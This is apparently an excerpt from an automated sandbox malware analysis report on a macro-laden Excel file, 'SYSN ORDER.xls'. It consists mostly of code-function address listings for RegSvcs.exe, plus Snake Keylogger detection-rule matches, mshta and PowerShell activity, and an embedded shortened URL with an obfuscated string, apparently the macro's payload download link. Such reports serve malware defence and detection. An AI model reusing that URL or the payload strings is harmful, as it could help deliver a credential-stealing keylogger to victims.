            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C700114_2_003C7001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C6BA014_2_003C6BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003C746114_2_003C7461
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003CC74214_2_003CC742
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003CBFC814_2_003CBFC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CF46014_2_004CF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CD4E014_2_004CD4E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CC48014_2_004CC480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CE17814_2_004CE178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C25E014_2_004C25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C5E5814_2_004C5E58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CEE1014_2_004CEE10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CDB3014_2_004CDB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CE7C014_2_004CE7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C444814_2_004C4448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C945914_2_004C9459
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C946814_2_004C9468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C147014_2_004C1470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C101A14_2_004C101A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C102814_2_004C1028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CC02814_2_004CC028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C443A14_2_004C443A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C6CC814_2_004C6CC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C18C914_2_004C18C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C18D814_2_004C18D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CC8D814_2_004CC8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C98E814_2_004C98E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C4CE814_2_004C4CE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C4CF814_2_004C4CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C148014_2_004C1480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C489014_2_004C4890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C48A014_2_004C48A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C9D4014_2_004C9D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C514014_2_004C5140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C515014_2_004C5150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C217814_2_004C2178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C1D2014_2_004C1D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C1D3014_2_004C1D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C25D014_2_004C25D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA5E114_2_004CA5E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA5F014_2_004CA5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C59F014_2_004C59F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C218814_2_004C2188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA18814_2_004CA188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA19814_2_004CA198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C55A814_2_004C55A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C55A014_2_004C55A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAA4814_2_004CAA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C5A0014_2_004C5A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C7A1014_2_004C7A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2A2814_2_004C2A28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2A3814_2_004C2A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAA3814_2_004CAA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C32D914_2_004C32D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C32E814_2_004C32E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2E8114_2_004C2E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C769814_2_004C7698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2E9014_2_004C2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAE9014_2_004CAE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAEA014_2_004CAEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C374014_2_004C3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C076814_2_004C0768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB76714_2_004CB767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C077814_2_004C0778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB77814_2_004CB778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C030F14_2_004C030F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C870814_2_004C8708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB31114_2_004CB311
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C032014_2_004C0320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB32014_2_004CB320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C373214_2_004C3732
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C0BC014_2_004C0BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CBBC114_2_004CBBC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C0BD014_2_004C0BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CBBD014_2_004CBBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3FE014_2_004C3FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3FF014_2_004C3FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3B8814_2_004C3B88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3B9814_2_004C3B98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0089069014_2_00890690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00890CD814_2_00890CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0089004014_2_00890040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0089001214_2_00890012
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D503823_2_002D5038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D305523_2_002D3055
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D389123_2_002D3891
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D78CB23_2_002D78CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D413023_2_002D4130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D291023_2_002D2910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DD1E823_2_002DD1E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D5B1823_2_002D5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D3B7023_2_002D3B70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D2BF023_2_002D2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D441023_2_002D4410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D844823_2_002D8448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D35B023_2_002D35B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D3E5123_2_002D3E51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D674123_2_002D6741
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DC75023_2_002DC750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D502823_2_002D5028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D700123_2_002D7001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D6BA023_2_002D6BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D746123_2_002D7461
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DFCAD23_2_002DFCAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DC74423_2_002DC744
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DBFC823_2_002DBFC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044F46023_2_0044F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044D4E023_2_0044D4E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044C48023_2_0044C480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044E17823_2_0044E178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00445E5823_2_00445E58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044EE1023_2_0044EE10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044DB3023_2_0044DB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044E7C023_2_0044E7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044444423_2_00444444
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044444823_2_00444448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044945923_2_00449459
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044946823_2_00449468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044147023_2_00441470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044101B23_2_0044101B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044102823_2_00441028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044C02823_2_0044C028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00446CC823_2_00446CC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004418C923_2_004418C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004418D823_2_004418D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044C8D823_2_0044C8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004498E823_2_004498E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00444CE823_2_00444CE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00444CF823_2_00444CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044148023_2_00441480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004448A023_2_004448A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00446CBC23_2_00446CBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00449D4023_2_00449D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044514023_2_00445140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044515023_2_00445150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044217823_2_00442178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00441D2B23_2_00441D2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00441D3023_2_00441D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004425D023_2_004425D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004425E023_2_004425E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A5E123_2_0044A5E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A5F023_2_0044A5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004459FD23_2_004459FD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044218823_2_00442188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A18823_2_0044A188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A19823_2_0044A198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004455A523_2_004455A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004455A823_2_004455A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AA4823_2_0044AA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00445A0023_2_00445A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00447A0023_2_00447A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00447A1023_2_00447A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442A2823_2_00442A28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442A3823_2_00442A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AA3823_2_0044AA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004432DC23_2_004432DC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004432E823_2_004432E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004486F923_2_004486F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442E8123_2_00442E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442E9023_2_00442E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AE9023_2_0044AE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044769823_2_00447698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AEA023_2_0044AEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044374023_2_00443740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B76723_2_0044B767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044076823_2_00440768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044077823_2_00440778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B77823_2_0044B778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044030F23_2_0044030F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044870823_2_00448708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B31123_2_0044B311
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044032023_2_00440320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B32023_2_0044B320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044373423_2_00443734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00440BC023_2_00440BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044BBC123_2_0044BBC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00440BD023_2_00440BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044BBD023_2_0044BBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443FE823_2_00443FE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443FF023_2_00443FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443B8823_2_00443B88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443B9823_2_00443B98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0056004023_2_00560040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00560CD823_2_00560CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0056069023_2_00560690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0056000623_2_00560006
            Source: SYSN ORDER.xlsOLE indicator, VBA macros: true
            Source: SYSN ORDER.xlsStream path 'MBD001B9740/\x1Ole' : https://og1.in/cIP5a8miBIeF/GQC',"YaFEdijZulawZYSksOQlKCUWxjdwUoA4h2GpYRQlYTPBA24YDisF2ZW9APJjMjVsD7InAfF30tXJqFHsNJPHgLhKVU47sdTJoHRZ7OtgjdqGyE1Z0FmDcCYjJOrVYsLAqhDnTkepq0MsMMtBouvigw8ZmOmIM31YFW10fPTlf5IBCSDjDt3SxoGb4QB8m46M0Pdma40d9k1F5XnmlLNx1GSAAJYMbxkk21wpXsW4Idy01pDY)?sjXp2w_]%jW<
            Source: B8230000.0.drStream path 'MBD001B9740/\x1Ole' : https://og1.in/cIP5a8miBIeF/GQC',"YaFEdijZulawZYSksOQlKCUWxjdwUoA4h2GpYRQlYTPBA24YDisF2ZW9APJjMjVsD7InAfF30tXJqFHsNJPHgLhKVU47sdTJoHRZ7OtgjdqGyE1Z0FmDcCYjJOrVYsLAqhDnTkepq0MsMMtBouvigw8ZmOmIM31YFW10fPTlf5IBCSDjDt3SxoGb4QB8m46M0Pdma40d9k1F5XnmlLNx1GSAAJYMbxkk21wpXsW4Idy01pDY)?sjXp2w_]%jW<
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@27/30@46/10
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\B8230000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8A06.tmpJump to behavior
            Source: SYSN ORDER.xlsOLE indicator, Workbook stream: true
            Source: B8230000.0.drOLE indicator, Workbook stream: true
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................{b.............Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm....................../..l....}..w.....{b.....\.......................(.P.....................8...............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................{b.....}..w.............$[........l......Z.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm....................../..l....}..w.....{b.....\.......................(.P.....................8...............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................{b.....}..w.............$[........l......Z.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..$[........l......Z.....(.P............................. .......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................{b.....}..w.............$[........l......Z.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................{b.....}..w.............$[........l......Z.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................{b.....}..w.............$[........l......Z.....(.P.............................l.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........{b.....}..w.............$[........l......Z.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................{b.............0........Wl.....}..w....8.......@E......^...............(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................{b......................Wl.....}..w....8.......@E......^...............(.P.....................................................Jump to behavior
